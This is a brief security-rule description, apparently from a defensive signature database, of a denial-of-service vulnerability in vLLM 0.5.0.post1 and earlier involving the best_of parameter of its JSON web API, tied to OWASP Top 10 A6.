VLLM is an open-source high-throughput and memory efficient inference and service engine for LLM. VLLM 0.5.0.post1 and earlier versions have a resource management error vulnerability, which is caused by improper handling of the best_of parameter in the vllm JSON web API, resulting in a denial of service. This rule supports to defend the A6: Vulnerable and Outdated Components of OWASP Top 10 - 2021. Other reference:None